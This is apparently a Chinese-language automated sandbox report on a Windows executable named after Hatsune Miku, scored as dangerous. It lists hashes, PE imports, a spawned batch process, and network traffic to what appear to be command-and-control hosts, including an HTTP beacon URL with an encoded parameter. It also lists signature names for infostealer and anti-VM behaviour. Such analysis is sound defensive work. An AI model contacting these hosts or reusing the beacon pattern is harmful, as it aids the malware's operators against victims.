比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-hpdapp01-1 2020-09-25 19:28:45 2020-09-25 19:31:22 157 秒

魔盾分数

10.0

危险的

文件详细信息

文件名 初音未来.exe
文件大小 11112448 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 69b600483ef2bb1e9ceb5205ada22f20
SHA1 e471f5b7f819f3bdd4c5753778c03b01ff9b9208
SHA256 e61945e5f6c10cfeae902d6b5f95f96e1e342d19a2bc5edccae544cd7665d026
SHA512 d7352cced657424b667a91686cb46bcf56af7efdcdf3862f56a528090e67c3fe4bb378bb2f4f535f8ec6de1d070420144e7779c4a4ef983e065b77f9fce3aff8
CRC32 4A793D71
Ssdeep 196608:S7JZDqNOoyxDqvIhzLJ3GZcodJqzGx+Mlnj9Y2+aM5x5w:S7LqNOoGDRLJ3mcGwTMlj97Uxa
Yara 登录查看Yara规则
样本下载 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net.0.1.cn.akamaitech.net
CNAME a1983.dscd.akamai.net
A 23.35.98.32
A 23.35.98.25
29.o533.net A 221.229.162.40

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x0049607d
声明校验值 0x00000000
实际校验值 0x00aa3be1
最低操作系统版本要求 4.0
编译时间 2020-09-25 19:25:26
载入哈希 c562e5c0b310365e3e08b0ac583da40f

版本信息

LegalCopyright
FileVersion
CompanyName
Comments
ProductName
ProductVersion
FileDescription
Translation

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x000b5b6a 0x000b6000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.55
.rdata 0x000b7000 0x009c3012 0x009c4000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.91
.data 0x00a7b000 0x00049fa8 0x00018000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.01
.rsrc 0x00ac5000 0x000054f8 0x00006000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.05

导入

库: KERNEL32.dll:
0x4b7170 GetLocalTime
0x4b7174 GetSystemTime
0x4b717c RtlUnwind
0x4b7180 GetStartupInfoA
0x4b7184 GetOEMCP
0x4b7188 GetCPInfo
0x4b718c GetProcessVersion
0x4b7190 SetErrorMode
0x4b7194 GlobalFlags
0x4b7198 GetCurrentThread
0x4b719c GetFileTime
0x4b71a0 RaiseException
0x4b71a4 TlsGetValue
0x4b71a8 LocalReAlloc
0x4b71ac TlsSetValue
0x4b71b0 TlsFree
0x4b71b4 GlobalHandle
0x4b71b8 TlsAlloc
0x4b71bc LocalAlloc
0x4b71c0 lstrcmpA
0x4b71c4 GetVersion
0x4b71c8 GlobalGetAtomNameA
0x4b71cc GlobalAddAtomA
0x4b71d0 GlobalFindAtomA
0x4b71d4 GlobalDeleteAtom
0x4b71d8 lstrcmpiA
0x4b71dc SetEndOfFile
0x4b71e0 UnlockFile
0x4b71e4 LockFile
0x4b71e8 FlushFileBuffers
0x4b71ec SetFilePointer
0x4b71f0 GetCurrentProcess
0x4b71f4 DuplicateHandle
0x4b71f8 lstrcpynA
0x4b71fc SetLastError
0x4b7208 LocalFree
0x4b7214 TerminateProcess
0x4b7218 HeapSize
0x4b721c GetACP
0x4b7234 SetHandleCount
0x4b7238 GetStdHandle
0x4b723c GetFileType
0x4b7244 HeapDestroy
0x4b7248 HeapCreate
0x4b724c VirtualFree
0x4b7254 LCMapStringA
0x4b7258 LCMapStringW
0x4b725c VirtualAlloc
0x4b7260 IsBadWritePtr
0x4b7264 GetStringTypeA
0x4b7268 GetStringTypeW
0x4b7270 CompareStringA
0x4b7274 CompareStringW
0x4b7278 IsBadReadPtr
0x4b727c IsBadCodePtr
0x4b7280 SetStdHandle
0x4b7284 SuspendThread
0x4b7288 ReleaseMutex
0x4b728c CreateMutexA
0x4b7290 TerminateThread
0x4b7294 CreateSemaphoreA
0x4b7298 ResumeThread
0x4b729c ReleaseSemaphore
0x4b72a8 GetProfileStringA
0x4b72ac WriteFile
0x4b72b4 CreateFileA
0x4b72b8 SetEvent
0x4b72bc FindResourceA
0x4b72c0 LoadResource
0x4b72c4 LockResource
0x4b72c8 ReadFile
0x4b72cc lstrlenW
0x4b72d0 GetModuleFileNameA
0x4b72d4 WideCharToMultiByte
0x4b72d8 MultiByteToWideChar
0x4b72dc GetCurrentThreadId
0x4b72e0 ExitProcess
0x4b72e4 GlobalSize
0x4b72e8 GlobalFree
0x4b72f4 lstrcatA
0x4b72f8 lstrlenA
0x4b72fc CloseHandle
0x4b7300 WinExec
0x4b7304 lstrcpyA
0x4b7308 FindNextFileA
0x4b730c GlobalReAlloc
0x4b7310 HeapFree
0x4b7314 HeapReAlloc
0x4b7318 GetProcessHeap
0x4b731c HeapAlloc
0x4b7320 GetUserDefaultLCID
0x4b7324 GetFullPathNameA
0x4b7328 FreeLibrary
0x4b732c LoadLibraryA
0x4b7330 GetLastError
0x4b7334 GetVersionExA
0x4b733c CreateThread
0x4b7340 CreateEventA
0x4b7344 Sleep
0x4b7348 GlobalAlloc
0x4b734c GlobalLock
0x4b7350 GlobalUnlock
0x4b7354 FindFirstFileA
0x4b7358 FindClose
0x4b735c SetFileAttributesA
0x4b7360 GetFileAttributesA
0x4b7364 DeleteFileA
0x4b7370 GetModuleHandleA
0x4b7374 GetProcAddress
0x4b7378 MulDiv
0x4b737c GetCommandLineA
0x4b7380 GetTickCount
0x4b7384 CreateProcessA
0x4b7388 WaitForSingleObject
0x4b738c GetFileSize
库: USER32.dll:
0x4b73c8 LoadIconA
0x4b73cc TranslateMessage
0x4b73d0 DrawFrameControl
0x4b73d4 DrawEdge
0x4b73d8 DrawFocusRect
0x4b73dc WindowFromPoint
0x4b73e0 GetMessageA
0x4b73e4 DispatchMessageA
0x4b73e8 SetRectEmpty
0x4b73f8 DrawIconEx
0x4b73fc CreatePopupMenu
0x4b7400 AppendMenuA
0x4b7404 ModifyMenuA
0x4b7408 CreateMenu
0x4b7410 GetDlgCtrlID
0x4b7414 GetSubMenu
0x4b7418 EnableMenuItem
0x4b741c ClientToScreen
0x4b7424 LoadImageA
0x4b742c ShowWindow
0x4b7430 IsWindowEnabled
0x4b7438 GetKeyState
0x4b7440 PostQuitMessage
0x4b7444 IsZoomed
0x4b7448 GetClassInfoA
0x4b744c DefWindowProcA
0x4b7450 GetSystemMenu
0x4b7454 DeleteMenu
0x4b7458 GetMenu
0x4b745c SetMenu
0x4b7460 PeekMessageA
0x4b7464 IsIconic
0x4b7468 SetFocus
0x4b746c GetActiveWindow
0x4b7470 GetWindow
0x4b7478 SetWindowRgn
0x4b747c GetMessagePos
0x4b7480 ScreenToClient
0x4b7488 CopyRect
0x4b748c LoadBitmapA
0x4b7490 WinHelpA
0x4b7494 KillTimer
0x4b7498 SetTimer
0x4b749c ReleaseCapture
0x4b74a0 GetCapture
0x4b74a4 SetCapture
0x4b74a8 GetScrollRange
0x4b74ac SetScrollRange
0x4b74b0 SetScrollPos
0x4b74b4 SetRect
0x4b74b8 InflateRect
0x4b74bc IntersectRect
0x4b74c0 DestroyIcon
0x4b74c4 PtInRect
0x4b74c8 OffsetRect
0x4b74cc IsWindowVisible
0x4b74d0 EnableWindow
0x4b74d4 UnregisterClassA
0x4b74d8 GetWindowLongA
0x4b74dc SetWindowLongA
0x4b74e0 GetSysColor
0x4b74e4 SetActiveWindow
0x4b74e8 SetCursorPos
0x4b74ec LoadCursorA
0x4b74f0 SetCursor
0x4b74f4 GetDC
0x4b74f8 FillRect
0x4b74fc IsRectEmpty
0x4b7500 ReleaseDC
0x4b7504 IsChild
0x4b7508 DestroyMenu
0x4b750c SetForegroundWindow
0x4b7510 GetWindowRect
0x4b7514 EqualRect
0x4b7518 UpdateWindow
0x4b751c ValidateRect
0x4b7520 InvalidateRect
0x4b7524 GetClientRect
0x4b7528 GetFocus
0x4b752c GetParent
0x4b7530 GetTopWindow
0x4b7534 PostMessageA
0x4b7538 IsWindow
0x4b753c SetParent
0x4b7540 DestroyCursor
0x4b7544 SendMessageA
0x4b7548 SetWindowPos
0x4b754c GetWindowTextA
0x4b7554 CharUpperA
0x4b7558 GetWindowDC
0x4b755c BeginPaint
0x4b7560 EndPaint
0x4b7564 TabbedTextOutA
0x4b7568 DrawTextA
0x4b756c GrayStringA
0x4b7570 GetDlgItem
0x4b7574 DestroyWindow
0x4b757c EndDialog
0x4b7580 GetNextDlgTabItem
0x4b7584 GetWindowPlacement
0x4b758c GetForegroundWindow
0x4b7590 GetLastActivePopup
0x4b7594 GetMessageTime
0x4b7598 RemovePropA
0x4b759c CallWindowProcA
0x4b75a0 GetPropA
0x4b75a4 UnhookWindowsHookEx
0x4b75a8 SetPropA
0x4b75ac GetClassLongA
0x4b75b0 CallNextHookEx
0x4b75b4 SetWindowsHookExA
0x4b75b8 CreateWindowExA
0x4b75bc GetMenuItemID
0x4b75c0 GetMenuItemCount
0x4b75c4 RegisterClassA
0x4b75c8 GetScrollPos
0x4b75cc AdjustWindowRectEx
0x4b75d0 MapWindowPoints
0x4b75d4 SendDlgItemMessageA
0x4b75d8 ScrollWindowEx
0x4b75dc IsDialogMessageA
0x4b75e0 SetWindowTextA
0x4b75e4 MoveWindow
0x4b75e8 CheckMenuItem
0x4b75ec SetMenuItemBitmaps
0x4b75f0 GetMenuState
0x4b75f8 GetClassNameA
0x4b75fc GetDesktopWindow
0x4b7600 LoadStringA
0x4b7604 GetSysColorBrush
0x4b7608 MessageBoxA
0x4b760c GetCursorPos
0x4b7610 GetSystemMetrics
0x4b7614 EmptyClipboard
0x4b7618 SetClipboardData
0x4b761c OpenClipboard
0x4b7620 GetClipboardData
0x4b7624 CloseClipboard
0x4b7628 wsprintfA
0x4b762c WaitForInputIdle
0x4b7630 RedrawWindow
库: GDI32.dll:
0x4b7024 GetTextMetricsA
0x4b7028 ExtTextOutA
0x4b702c TextOutA
0x4b7030 RectVisible
0x4b7034 PtVisible
0x4b7038 GetViewportExtEx
0x4b703c Escape
0x4b7040 ExtSelectClipRgn
0x4b7044 SetBkColor
0x4b704c SetStretchBltMode
0x4b7050 GetClipRgn
0x4b7054 CreatePolygonRgn
0x4b7058 SelectClipRgn
0x4b705c DeleteObject
0x4b7060 CreateDIBitmap
0x4b7068 CreatePalette
0x4b706c StretchBlt
0x4b7070 SelectPalette
0x4b7074 RealizePalette
0x4b7078 GetDIBits
0x4b707c GetWindowExtEx
0x4b7080 GetViewportOrgEx
0x4b7084 GetWindowOrgEx
0x4b7088 BeginPath
0x4b708c EndPath
0x4b7090 PathToRegion
0x4b7094 CreateEllipticRgn
0x4b7098 CreateRoundRectRgn
0x4b709c GetTextColor
0x4b70a0 GetBkMode
0x4b70a4 GetBkColor
0x4b70a8 GetROP2
0x4b70ac GetStretchBltMode
0x4b70b0 GetPolyFillMode
0x4b70b8 CreateDCA
0x4b70bc CreateBitmap
0x4b70c0 SelectObject
0x4b70c4 CreatePen
0x4b70c8 PatBlt
0x4b70cc ScaleViewportExtEx
0x4b70d0 SetViewportExtEx
0x4b70d4 OffsetViewportOrgEx
0x4b70d8 SetViewportOrgEx
0x4b70dc SetMapMode
0x4b70e0 SetTextColor
0x4b70e4 SetROP2
0x4b70e8 SetPolyFillMode
0x4b70ec SetBkMode
0x4b70f0 RestoreDC
0x4b70f4 SaveDC
0x4b70f8 CombineRgn
0x4b70fc CreateRectRgn
0x4b7100 FillRgn
0x4b7104 CreateSolidBrush
0x4b7108 CreateFontIndirectA
0x4b710c GetStockObject
0x4b7110 GetObjectA
0x4b7114 EndPage
0x4b7118 EndDoc
0x4b711c DeleteDC
0x4b7120 StartDocA
0x4b7124 StartPage
0x4b7128 BitBlt
0x4b712c CreateCompatibleDC
0x4b7130 Ellipse
0x4b7134 Rectangle
0x4b7138 LPtoDP
0x4b713c DPtoLP
0x4b7140 GetCurrentObject
0x4b7144 RoundRect
0x4b714c GetDeviceCaps
0x4b7150 LineTo
0x4b7154 MoveToEx
0x4b7158 ExcludeClipRect
0x4b715c GetClipBox
0x4b7160 ScaleWindowExtEx
0x4b7164 SetWindowExtEx
0x4b7168 SetWindowOrgEx
库: WINMM.dll:
0x4b7640 waveOutWrite
0x4b7644 waveOutPause
0x4b7648 waveOutReset
0x4b764c waveOutClose
0x4b7650 waveOutGetNumDevs
0x4b7654 waveOutOpen
0x4b765c midiStreamOpen
0x4b7660 midiStreamProperty
0x4b7668 midiStreamOut
0x4b766c waveOutRestart
0x4b7670 midiStreamStop
0x4b7674 midiOutReset
0x4b7678 midiStreamClose
0x4b767c midiStreamRestart
库: WINSPOOL.DRV:
0x4b7684 OpenPrinterA
0x4b7688 DocumentPropertiesA
0x4b768c ClosePrinter
库: ADVAPI32.dll:
0x4b7000 RegCloseKey
0x4b7004 RegOpenKeyExA
0x4b7008 RegSetValueExA
0x4b700c RegQueryValueA
0x4b7010 RegCreateKeyExA
库: SHELL32.dll:
0x4b73bc ShellExecuteA
0x4b73c0 Shell_NotifyIconA
库: ole32.dll:
0x4b76d4 CLSIDFromProgID
0x4b76d8 OleRun
0x4b76dc CoCreateInstance
0x4b76e0 CLSIDFromString
0x4b76e4 OleUninitialize
0x4b76e8 OleInitialize
库: OLEAUT32.dll:
0x4b7394 VariantCopyInd
0x4b7398 VariantInit
0x4b739c SysAllocString
0x4b73a0 RegisterTypeLib
0x4b73a4 LHashValOfNameSys
0x4b73a8 LoadTypeLib
0x4b73ac UnRegisterTypeLib
0x4b73b0 VariantChangeType
0x4b73b4 VariantClear
库: COMCTL32.dll:
0x4b7018 ImageList_Destroy
0x4b701c None
库: WS2_32.dll:
0x4b7694 inet_ntoa
0x4b7698 WSACleanup
0x4b769c ntohl
0x4b76a0 accept
0x4b76a4 getpeername
0x4b76a8 recv
0x4b76ac ioctlsocket
0x4b76b0 recvfrom
0x4b76b4 closesocket
0x4b76b8 WSAAsyncSelect
库: comdlg32.dll:
0x4b76c0 ChooseColorA
0x4b76c4 GetOpenFileNameA
0x4b76c8 GetSaveFileNameA
0x4b76cc GetFileTitleA
.text
`.rdata
@.data
.rsrc
8`}<j
T$hVj
DRQPj
T$|Vj
T$th
|$TVj
jjjjh
没有防病毒引擎扫描信息!

进程树

____________.exe, PID: 2504, 上一级进程 PID: 2224
QQbrowserQQbrowserQQbrowser.bat, PID: 2568, 上一级进程 PID: 2504
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49162 103.45.183.154 9090
192.168.122.201 49165 103.45.183.154 9090
192.168.122.201 49168 103.45.183.154 9090
192.168.122.201 49163 221.229.162.40 29.o533.net 8088
192.168.122.201 49158 23.35.98.32 acroipm.adobe.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 61084 192.168.122.1 53
192.168.122.201 63282 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net.0.1.cn.akamaitech.net
CNAME a1983.dscd.akamai.net
A 23.35.98.32
A 23.35.98.25
29.o533.net A 221.229.162.40

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49162 103.45.183.154 9090
192.168.122.201 49165 103.45.183.154 9090
192.168.122.201 49168 103.45.183.154 9090
192.168.122.201 49163 221.229.162.40 29.o533.net 8088
192.168.122.201 49158 23.35.98.32 acroipm.adobe.com 80

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 61084 192.168.122.1 53
192.168.122.201 63282 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip 
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache
URL专业沙箱检测 -> http://29.o533.net:8088/m.asp?code=fgBIBBgGDBOBBBBBKNSb9HKelOzhkyrU0vks4OGIsgRHt6m8DPC4gLym6Am7lV6knNlFVOG8ngFhsTBHmvlwJeLiqca5b0RbhkeNSKoWIvPo9nYZ91A%%2bUEXG%%2bTE5yAP2HU2rDqCXWxQjkqgeR03/i3QbyW4u6CrYHoWRextvJD14VbKmJxfz2cH0edNrRLTgxzT7t2j1ZPHWEnaPSApjYqx0ZVJPHXy%%2b5pTK9tO90o4PfOAdJnmZwFHIUX%%2bMu/HEmVW%%2bnjXo8MTRzILW--23143 
GET /m.asp?code=fgBIBBgGDBOBBBBBKNSb9HKelOzhkyrU0vks4OGIsgRHt6m8DPC4gLym6Am7lV6knNlFVOG8ngFhsTBHmvlwJeLiqca5b0RbhkeNSKoWIvPo9nYZ91A%%2bUEXG%%2bTE5yAP2HU2rDqCXWxQjkqgeR03/i3QbyW4u6CrYHoWRextvJD14VbKmJxfz2cH0edNrRLTgxzT7t2j1ZPHWEnaPSApjYqx0ZVJPHXy%%2b5pTK9tO90o4PfOAdJnmZwFHIUX%%2bMu/HEmVW%%2bnjXo8MTRzILW--23143 HTTP/1.0
Host: 29.o533.net

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

源地址 目标地址 ICMP类型 数据
192.168.1.1 192.168.122.201 3
192.168.1.1 192.168.122.201 3

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
抱歉! 没有任何文件投放。
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 61.246 seconds )

  • 29.286 Static
  • 16.048 Suricata
  • 7.06 BehaviorAnalysis
  • 2.996 TargetInfo
  • 2.75 VirusTotal
  • 2.494 NetworkAnalysis
  • 0.447 peid
  • 0.111 AnalysisInfo
  • 0.035 config_decoder
  • 0.016 Strings
  • 0.003 Memory

Signatures ( 44.135 seconds )

  • 39.116 network_http
  • 1.916 md_url_bl
  • 0.321 api_spamming
  • 0.305 maldun_anomaly_massive_file_ops
  • 0.257 stealth_timeout
  • 0.217 stealth_decoy_document
  • 0.129 stealth_file
  • 0.126 virus
  • 0.124 reads_self
  • 0.123 antivm_generic_disk
  • 0.109 mimics_filetime
  • 0.108 bootkit
  • 0.103 rat_luminosity
  • 0.093 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.087 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.083 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.082 ransomware_extensions
  • 0.056 antiav_detectfile
  • 0.056 antiav_detectreg
  • 0.051 kovter_behavior
  • 0.045 antiemu_wine_func
  • 0.043 infostealer_browser_password
  • 0.043 infostealer_bitcoin
  • 0.037 infostealer_ftp
  • 0.03 hawkeye_behavior
  • 0.028 dridex_behavior
  • 0.028 ransomware_files
  • 0.026 md_domain_bl
  • 0.022 infostealer_im
  • 0.021 antivm_vbox_files
  • 0.017 antisandbox_sleep
  • 0.016 kazybot_behavior
  • 0.015 stealth_network
  • 0.014 infostealer_mail
  • 0.013 antivm_vbox_libs
  • 0.013 shifu_behavior
  • 0.012 anomaly_persistence_autorun
  • 0.012 antidbg_windows
  • 0.012 antianalysis_detectreg
  • 0.012 antidbg_devices
  • 0.011 dead_connect
  • 0.008 tinba_behavior
  • 0.008 betabot_behavior
  • 0.008 geodo_banking_trojan
  • 0.007 network_tor
  • 0.007 exec_crash
  • 0.006 antisandbox_sunbelt_libs
  • 0.006 ispy_behavior
  • 0.006 network_torgateway
  • 0.005 rat_nanocore
  • 0.005 antiav_avast_libs
  • 0.005 kibex_behavior
  • 0.005 hancitor_behavior
  • 0.005 antianalysis_detectfile
  • 0.005 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.005 rat_pcclient
  • 0.004 antisandbox_sboxie_libs
  • 0.004 antiav_bitdefender_libs
  • 0.003 andromeda_behavior
  • 0.003 antivm_vmware_libs
  • 0.003 injection_createremotethread
  • 0.003 vawtrak_behavior
  • 0.003 cerber_behavior
  • 0.003 sniffer_winpcap
  • 0.003 antivm_parallels_keys
  • 0.003 antivm_vmware_files
  • 0.003 antivm_xen_keys
  • 0.003 disables_browser_warn
  • 0.003 codelux_behavior
  • 0.003 network_tor_service
  • 0.002 antivm_generic_services
  • 0.002 antivm_vbox_window
  • 0.002 antivm_generic_scsi
  • 0.002 antivm_vmware_events
  • 0.002 anormaly_invoke_kills
  • 0.002 injection_runpe
  • 0.002 antisandbox_fortinet_files
  • 0.002 antisandbox_threattrack_files
  • 0.002 antivm_generic_diskreg
  • 0.002 browser_security
  • 0.002 modify_proxy
  • 0.002 darkcomet_regkeys
  • 0.002 malicous_targeted_flame
  • 0.002 md_bad_drop
  • 0.002 network_cnc_http
  • 0.002 recon_fingerprint
  • 0.001 infostealer_browser
  • 0.001 Locky_behavior
  • 0.001 ursnif_behavior
  • 0.001 antisandbox_script_timer
  • 0.001 cryptowall_behavior
  • 0.001 bypass_firewall
  • 0.001 spreading_autoruninf
  • 0.001 modifies_hostfile
  • 0.001 antisandbox_cuckoo_files
  • 0.001 antisandbox_productid
  • 0.001 antisandbox_joe_anubis_files
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antivm_generic_system
  • 0.001 antivm_xen_keys
  • 0.001 antivm_hyperv_keys
  • 0.001 antivm_vbox_acpi
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_vpc_files
  • 0.001 antivm_vpc_keys
  • 0.001 banker_cridex
  • 0.001 banker_zeus_mutex
  • 0.001 bitcoin_opencl
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 maldun_anomaly_invoke_vb_vba
  • 0.001 maldun_network_blacklist
  • 0.001 office_security
  • 0.001 packer_armadillo_regkey
  • 0.001 ransomware_radamant
  • 0.001 rat_spynet
  • 0.001 stealth_modify_uac_prompt

Reporting ( 1.74 seconds )

  • 1.12 ReportHTMLSummary
  • 0.62 Malheur
Task ID 577684
Mongo ID 5f6dd5af2f8f2e0ab852d05a
Cuckoo release 1.4-Maldun